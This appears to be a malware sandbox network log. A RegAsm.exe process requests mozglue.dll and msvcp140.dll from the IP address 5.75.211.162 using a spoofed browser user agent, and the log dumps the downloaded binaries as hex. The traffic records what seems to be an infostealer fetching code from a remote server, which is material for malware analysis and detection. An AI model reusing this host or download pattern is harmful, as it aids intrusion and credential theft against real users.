                                                                                    Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                    2024-09-26 22:14:44 UTC16384INData Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8
                                                                                    Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                    2024-09-26 22:14:44 UTC16384INData Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01
                                                                                    Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                    2024-09-26 22:14:44 UTC16384INData Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1
                                                                                    Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                    2024-09-26 22:14:44 UTC16384INData Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f
                                                                                    Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                    2024-09-26 22:14:44 UTC16384INData Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00
                                                                                    Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                    2024-09-26 22:14:44 UTC16384INData Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff
                                                                                    Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                    2024-09-26 22:14:44 UTC16384INData Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80
                                                                                    Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                    2024-09-26 22:14:44 UTC16384INData Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6
                                                                                    Data Ascii: ,0<48%8A)$


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.4497525.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:45 UTC196OUTGET /mozglue.dll HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:46 UTC262INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:46 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 608080
                                                                                    Connection: close
                                                                                    Last-Modified: Thursday, 26-Sep-2024 22:14:46 GMT
                                                                                    Cache-Control: no-store, no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    2024-09-26 22:14:46 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                    2024-09-26 22:14:46 UTC16384INData Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00
                                                                                    Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                    2024-09-26 22:14:46 UTC16384INData Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c
                                                                                    Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                    2024-09-26 22:14:46 UTC16384INData Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9
                                                                                    Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                    2024-09-26 22:14:46 UTC16384INData Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89
                                                                                    Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                    2024-09-26 22:14:46 UTC16384INData Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc
                                                                                    Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                    2024-09-26 22:14:46 UTC16384INData Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34
                                                                                    Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                    2024-09-26 22:14:46 UTC16384INData Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c
                                                                                    Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
                                                                                    2024-09-26 22:14:46 UTC16384INData Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b
                                                                                    Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                    2024-09-26 22:14:46 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                    Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.4497535.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:47 UTC197OUTGET /msvcp140.dll HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:47 UTC262INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:47 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 450024
                                                                                    Connection: close
                                                                                    Last-Modified: Thursday, 26-Sep-2024 22:14:47 GMT
                                                                                    Cache-Control: no-store, no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    2024-09-26 22:14:47 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                    2024-09-26 22:14:47 UTC16384INData Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d
                                                                                    Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
